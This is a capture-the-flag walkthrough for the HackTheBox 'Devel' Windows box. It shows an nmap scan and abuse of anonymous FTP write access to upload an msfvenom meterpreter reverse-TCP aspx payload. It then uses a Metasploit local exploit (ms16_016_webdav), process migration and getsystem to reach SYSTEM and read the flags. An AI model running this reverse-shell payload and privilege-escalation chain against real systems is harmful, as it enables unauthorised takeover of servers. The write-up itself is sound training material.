Devel is a relatively easy hackthebox Windows machine, which can be done almost all the way with metasploit.
Lets run NMAP with nmap -sC -sT -oA nmap -n 10.10.10.5 (to check what each option does simply type nmap –help)
┌─[✗]─[luka@parrot]─[~/Desktop/htb/Devel/nmap] └──╼ $sudo nmap -sC -sT -oA nmap -n 10.10.10.5 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-19 20:32 CET Nmap scan report for 10.10.10.5 Host is up (0.028s latency). Not shown: 998 filtered ports PORT STATE SERVICE 21/tcp open ftp | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 01:06AM aspnet_client | 03-17-17 04:37PM 689 iisstart.htm | 03-21-19 10:13PM 914405 ipsec.aspx |03-17-17 04:37PM 184946 welcome.png | ftp-syst: | SYST: Windows_NT 80/tcp open http | http-methods: |_ Potentially risky methods: TRACE |_http-title: IIS7 Nmap done: 1 IP address (1 host up) scanned in 6.09 seconds
Before checking FTP server on the Devel machine i’d be normally wise to start gobuster/dirbuster in the background. It couldn’t find anything though.
We can log in onto FTP Server using anonymous/random_password credentials. We have write privileges as well.
Test file could have been successfully transferred and we can also see the uploaded file on the web server in browser.
Exploitation / Initial Foothold
We can obviously upload and run aspx files, so lets create payload in the msfvenom. I used shikata_ga_nai encoder which isn’t really helping that much if some kind of protection like antivirus/windows defender would be activated. I will use meterpreter for this box.
┌─[root@parrot]─[/home/luka/Desktop/htb/Devel/payload] └──╼ #msfvenom -p windows/meterpreter/reverse_tcp RHOST=10.10.10.5 LHOST=10.10.14.68 LPORT=5555 -e x86/shikata_ga_nai -o payload.aspx -f aspx [-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload [-] No arch selected, selecting arch: x86 from the payload Found 1 compatible encoders Attempting to encode payload with 1 iterations of x86/shikata_ga_nai x86/shikata_ga_nai succeeded with size 368 (iteration=0) x86/shikata_ga_nai chosen with final size 368 Payload size: 368 bytes Final size of aspx file: 2960 bytes Saved as: payload.aspx
Payload was uploaded on the server using “put payload.aspx”.
We can run it in the browser. If everything was set up correctly, we should see a new session in the meterpreter.
meterpreter > sysinfo Computer : DEVEL OS : Windows 7 (Build 7600). Architecture : x86 System Language : el_GR Domain : HTB Logged On Users : 0 Meterpreter : x86/windows meterpreter > getuid Server username: IIS APPPOOL\Web
Since this is unpatched Windows 7 system, there are more than option available to escalate the privileges. One way is to use local exploit suggest module from Metasploit: “use post/multi/recon/local_exploit_suggester”
msf5 post(multi/recon/local_exploit_suggester) > run  10.10.10.5 - Collecting local exploits for x86/windows…  10.10.10.5 - 29 exploit checks are being tried… [+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable. [+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated. [+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
Another way would be to use more granular search – this way we also see the Rank of the exploit – this might make the decision easier:
“search platform:windows type:exploit arch:x86 -S privilege”
I used the exploit/windows/local/ms16_016_webdav exploit for privilege escalation.
msf5 exploit(windows/local/ms16_016_webdav) > run  Started reverse TCP handler on 192.168.0.190:4444  Launching notepad to host the exploit… [+] Process 3068 launched.  Reflectively injecting the exploit DLL into 3068…  Exploit injected … injecting payload into 3068… [*] Done. Verify privileges manually or use 'getuid' if using meterpreter to verify exploitation.
I ran ps in meterpreter, exploit above created a new process – notepad.exe running as SYSTEM.
3068 2096 notepad.exe x86 0 NT AUTHORITY\SYSTEM C:\Windows\system32\notepad.exe
I could successfully migrate to the process and get SYSTEM privileges using getsystem.
meterpreter > migrate 3068  Migrating from 2052 to 3068 zlib(finalizer): the stream was freed prematurely.  Migration completed successfully. meterpreter > getsystem …got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)). meterpreter > getuid Server username: NT AUTHORITY\SYSTEM meterpreter >
To switch between from Meterpreter and shell you simply type shell into meterpreters command line and with ctrl+z you can get back into the meterpreter.
c:\Users\babis\Desktop>dir dir Volume in drive C has no label. Volume Serial Number is 8620-71F1 Directory of c:\Users\babis\Desktop 18/03/2017 01:14 . 18/03/2017 01:14 .. 18/03/2017 01:18 32 user.txt.txt 1 File(s) 32 bytes 2 Dir(s) 24.573.169.664 bytes free c:\Users\babis\Desktop>type user.txt.txt type user.txt.txt *deleted* Directory of c:\Users\Administrator\Desktop 18/03/2017 01:17 . 18/03/2017 01:17 .. 18/03/2017 01:17 32 root.txt.txt 1 File(s) 32 bytes 2 Dir(s) 24.573.169.664 bytes free c:\Users\Administrator\Desktop>type root.txt.txt type root.txt.txt *deleted*
We’ve now got System privileges on the box and both flags can be read.